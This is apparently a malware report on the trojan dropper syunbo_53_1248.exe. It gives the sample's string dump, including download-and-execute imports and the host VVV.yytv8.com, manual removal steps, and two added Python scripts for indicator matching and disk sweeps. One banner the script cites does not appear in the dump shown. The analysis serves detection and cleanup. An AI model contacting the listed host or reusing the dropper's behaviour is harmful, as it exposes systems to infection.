failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
tftp_send_first: internal error
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
TFTP finished
bind() failed; %s
TFTP response timeout
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]<%s>
FETCH %s BODY[%s]
APPEND %s (\Seen) {%I64d}SEARCH %s
LOGINDISABLED
STARTTLS not supported.
STARTTLS denied. %c
Access denied. %c
IMAPS not supported!
%cd
%s %s
USER %s
APOP %s %s
AUTH %s %s
AUTH %s
STLS not supported.
Authentication failed: %d
PASS %s
POP3S not supported!
SMTP
EHLO %s
HELO %s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
SMTPS not supported!
PORT
Preparing for accepting server on data port
FTP response timeout
FTP response aborted due to select/poll error: %d
CWD %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
Failure sending PORT command: %s
Connect data stream passively
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
SIZE %s
%s%s%s
MDTM %s
APPE %s
STOR %s
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skip %d.%d.%d.%d for data connection, re-use %s instead
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
dddddd
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
RETR %s
Failed FTP upload:
RETR response: d
PBSZ %d
ACCT %s
Access denied: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
PRET command not accepted: d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
TYPE %c
Connecting to %s (%s) port %d
ftp_perform ends with SECONDARY: %d
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Uploading to a URL without a file name!
FTPS not supported!
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s
curl
%sAuthorization: Digest %s
%sAuthorization: NTLM %s
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
.jpeg
.html
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
------------------------xx
%c%c==
%c%c%c=
LOGIN
%s/%s
%s xxxxxxxxxxxxxxxx
00000001
xxxx
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%s
%s:%s:%s
%s:%s:x:%s:%s:%s
username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
user=%s
auth=Bearer %s
Unsupported SASL authentication mechanism
0123456789-
NTLMSSP%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
1.2.8
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
curl_global_init failed: %d
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Compute Cluster Edition
Microsoft Windows Server 2003 Storage Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 R2 Storage Server
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows Server 2008 R2
EEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
EEDTFJDVCLHQJLCHDMGWJUGGEEGNGQFNGYFBFKCNFLITFTBKBMDRIJGYFYIJAUHNIJEBATDIJJIBBECXHOGPJTEKHXJJJOIYJHGJIPBQBOHLFSDNEXEYIRADGREOBVAX
EEDTFJDVCLHQJLCBBIIFHBAEGYDJJIHOGOCVIREVDXJRDHDDCGGSDLDRGQBGHOCIGKBJASICIVGWEBFRHIBGCCCNHSCGAF
EEDTFJDVCLHQJLCHDMGXGUJLCWACAAFYBDJGEICOFTIAHMJGJKGJCVFNIUJGGHAWAIEZBCCOFEAOATEWJHDFAUCTBXIMFODUIXHKDODHIGBLHFGCERIOJUEUDPFEEGHK
SELECT * FROM Win32_OperatingSystem
InternetOpenUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
URLDownloadToFileW
ShellExecuteW
C:\Users\Administrator\Desktop\Q
\Release\nmjh.pdb
WLDAP32.dll
WS2_32.dll
PeekNamedPipe
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
CryptDestroyKey
CryptImportKey
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
IPHLPAPI.DLL
GetCPInfo
GetProcessHeap
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
2.cmd
kernel32.dll
Gateway:0.0.0.0
c:\Program Files\
#{ad498944-762f-11d0-8dcb-00c04fc3358c}wininet.dll
Mozilla/4.0 (compatible)
urlmon.dll
VVV.yytv8.com
shell32.dll
%d-%d-%d
%d-%d-%d-%d-%d-%d
C:\syunbo_53_1248.exe
1.0.0.1
YunBOWin.exe
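The strings listed above for syunbo_53_1248.exe (the "CLIENT libcurl 7.44.0-DEV" banner with its error table, the zlib 1.2.8 banners, the PDB fragment \Release\nmjh.pdb, a requireAdministrator manifest, the WMI query SELECT * FROM Win32_OperatingSystem, the URLDownloadToFileW and ShellExecuteW imports, the user agent "Mozilla/4.0 (compatible)" and the host name VVV.yytv8.com) are what a dump like this is built from. The following Python script is an added example; it is not part of the Lavasoft report and not Lavasoft tooling. It reproduces a minimal strings-style extractor (ASCII and UTF-16LE runs) and checks an image or memory dump for those indicators in both encodings. The indicator values are copied from the list above; the "three distinct hits" threshold, the indicator names and the bytes used in the test are the author's own choices, and the test input is constructed, not the sample.

```python
import re
import sys
from typing import Dict, List

# Indicators copied verbatim from the syunbo_53_1248.exe string dump above.
# The key names are the author's labels, not anything from the report.
INDICATORS: Dict[str, bytes] = {
    "pdb_path": b"\\Release\\nmjh.pdb",
    "libcurl_banner": b"CLIENT libcurl 7.44.0-DEV",
    "zlib_banner": b"inflate 1.2.8 Copyright 1995-2013 Mark Adler",
    "manifest_admin": b"<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />",
    "wmi_os_query": b"SELECT * FROM Win32_OperatingSystem",
    "download_api": b"URLDownloadToFileW",
    "user_agent": b"Mozilla/4.0 (compatible)",
    "domain": b"VVV.yytv8.com",
    "dropped_path": b"C:\\syunbo_53_1248.exe",
    # common prefix of the four long upper-case strings in the dump
    "encoded_prefix": b"EEDTFJDVCLHQJL",
}


def extract_strings(data: bytes, min_len: int = 8) -> List[str]:
    """Return printable ASCII and UTF-16LE runs of at least min_len characters,
    in offset order. This is the same idea as the string list above."""
    n = str(min_len).encode()
    ascii_re = re.compile(rb"[\x20-\x7e]{" + n + rb",}")
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){" + n + rb",}")
    found = []
    for m in ascii_re.finditer(data):
        found.append((m.start(), m.group().decode("ascii")))
    for m in wide_re.finditer(data):
        found.append((m.start(), m.group().decode("utf-16-le")))
    found.sort()
    return [s for _, s in found]


def match_indicators(data: bytes) -> Dict[str, List[str]]:
    """Map indicator name -> encodings in which it occurs ('ascii', 'utf16le').
    Wide matching matters because Win32 W-APIs and resources store UTF-16LE."""
    hits: Dict[str, List[str]] = {}
    for name, needle in INDICATORS.items():
        encodings = []
        if needle in data:
            encodings.append("ascii")
        if needle.decode("ascii").encode("utf-16-le") in data:
            encodings.append("utf16le")
        if encodings:
            hits[name] = encodings
    return hits


def triage(data: bytes) -> dict:
    """Summarise one image: PE magic, indicator hits and a crude score.
    The threshold of three distinct indicators is the author's choice."""
    hits = match_indicators(data)
    return {
        "is_pe": data[:2] == b"MZ",
        "hits": hits,
        "score": len(hits),
        "verdict": "match" if len(hits) >= 3 else "no match",
    }


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        print(triage(f.read()))
```

Run it against an unpacked image or a memory dump of the process: the report marks the original dropper as packed (PEID: UPX, UPolyX) and these strings were taken from the running syunbo_53_1248.exe process (PID 1300), so a packed file on disk may show none of them. A single hit such as the libcurl or zlib banner is not evidence on its own, since any statically linked curl build carries it; the PDB fragment, the dropped-file path and the host name are the specific ones.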
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setup_30004.exe:2012
syunbo_53_1248.exe:1300
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\anote\Alarm.wav (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (35241 bytes)
%Program Files%\anote\uninstall.exe (2392 bytes)
%Program Files%\anote\anote.dat (286 bytes)
%Program Files%\anote\Language\chinese.ini (2 bytes)
%Documents and Settings%\%current user%\Desktop\多彩便签.lnk (1 bytes; 多彩便签 means "Colorful Sticky Notes")
%Documents and Settings%\%current user%\Start Menu\Programs\多彩便签\öÃâ€ÃƒËœ.lnk (1 bytes)
%Program Files%\anote\cfg.ini (124 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\多彩便签\多彩便签.lnk (1 bytes)
%Program Files%\anote\anote.exe (36078 bytes)
%Program Files%\anote\about.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (11 bytes)
%Program Files%\anote\anote.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (243 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\多彩便签\帮助.lnk (286 bytes; 帮助 means "Help")
C:\syunbo_53_1248.exe (6396 bytes)
%Program Files%\dBwBAAAAAAAA (207286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\psb[1].gif (383250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe (81171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\setup_30004.exe (34350 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
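The removal steps above form one procedure: stop the two processes, delete the listed files, empty the Temporary Internet Files cache, reboot. Before deleting anything it is worth confirming which of the artefacts are actually present and checking any file found against the report's hashes. The following Python script is an added example, not Lavasoft's tooling: it expands the report's %Program Files%, %Documents and Settings% and %current user% placeholders from a caller-supplied mapping, checks the listed paths and the randomly named Content.IE5 cache folders, and compares the SHA-256 of anything found with the dropper hash from the report header. The mapping values, the throw-away directory tree and the dummy file contents in demo() are constructed for illustration; the real hash only matches the real dropper.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List

# SHA-256 of the original dropper, copied from the report header.
KNOWN_SHA256 = {"4da272d4d9de237b32daf9a6a234c69c1874d027e346d699a31192798d500eac"}

# Files the report says the Trojan creates, with the report's own placeholders.
DROPPED_FILES: List[str] = [
    r"C:\syunbo_53_1248.exe",
    r"%Program Files%\setup_30004.exe",
    r"%Program Files%\dBwBAAAAAAAA",
    r"%Program Files%\anote\anote.exe",
    r"%Program Files%\anote\anote.dll",
    r"%Program Files%\anote\uninstall.exe",
    r"%Program Files%\anote\cfg.ini",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll",
]
# Cache entries sit under randomly named Content.IE5 subfolders, so match by file name.
CACHE_ROOT = r"%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
CACHE_NAMES = {"setup_30004[1].exe", "psb[1].gif"}


def expand(template: str, env: Dict[str, str]) -> str:
    """Replace %name% placeholders from env; an unknown placeholder is an error."""
    out = template
    for name, value in env.items():
        out = out.replace(f"%{name}%", value)
    if "%" in out:
        raise KeyError(f"unexpanded placeholder in {out!r}")
    return out


def to_path(root: Path, win_path: str) -> Path:
    """Map a Windows path (drive letter optional) onto a tree rooted at root,
    so the sweep works on a live volume or a mounted image alike."""
    parts = win_path.split("\\")
    if parts and parts[0].endswith(":"):
        parts = parts[1:]
    return root.joinpath(*[p for p in parts if p])


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root: Path, env: Dict[str, str],
          known_sha256: Iterable[str] = KNOWN_SHA256) -> Dict[str, List[str]]:
    """Report which listed artefacts exist under root and which match a known hash."""
    known = set(known_sha256)
    present: List[str] = []
    hash_matches: List[str] = []

    def check(p: Path) -> None:
        if not p.exists():
            return
        rel = p.relative_to(root).as_posix()
        present.append(rel)
        if p.is_file() and sha256_of(p) in known:
            hash_matches.append(rel)

    for template in DROPPED_FILES:
        check(to_path(root, expand(template, env)))
    cache = to_path(root, expand(CACHE_ROOT, env))
    if cache.is_dir():
        for sub in cache.iterdir():
            if sub.is_dir():
                for name in CACHE_NAMES:
                    check(sub / name)
    return {"present": sorted(present), "hash_matches": sorted(hash_matches)}


def demo() -> Dict[str, object]:
    """Build a throw-away tree with constructed stand-ins for three artefacts and
    sweep it twice: once with the dummy's own hash as 'known', once with the
    report's hash (which cannot match dummy content)."""
    root = Path(tempfile.mkdtemp(prefix="ioc_sweep_"))
    env = {"Program Files": r"C:\Program Files",
           "Documents and Settings": r"C:\Documents and Settings",
           "current user": "Administrator"}
    dummy = b"constructed stand-in, not the real sample\n"
    for rel in ("Program Files/anote/anote.exe",
                "syunbo_53_1248.exe",
                "Documents and Settings/Administrator/Local Settings/"
                "Temporary Internet Files/Content.IE5/4DQJW9YN/setup_30004[1].exe"):
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(dummy)
    (root / "Program Files" / "anote" / "benign.txt").write_bytes(b"not an indicator\n")
    with_dummy = sweep(root, env, known_sha256={hashlib.sha256(dummy).hexdigest()})
    with_report = sweep(root, env)
    return {"present": with_dummy["present"],
            "dummy_hash_matches": with_dummy["hash_matches"],
            "report_hash_matches": with_report["hash_matches"]}


if __name__ == "__main__":
    print(demo())
```

On a real host the mapping would be the actual profile folders (for the XP SP3 sandbox in this report, C:\Program Files and C:\Documents and Settings\<user>), and a present-but-hash-mismatched file still deserves a look: the report gives hashes only for the original dropper, not for the files it writes, and the byte sizes listed above come from a single run.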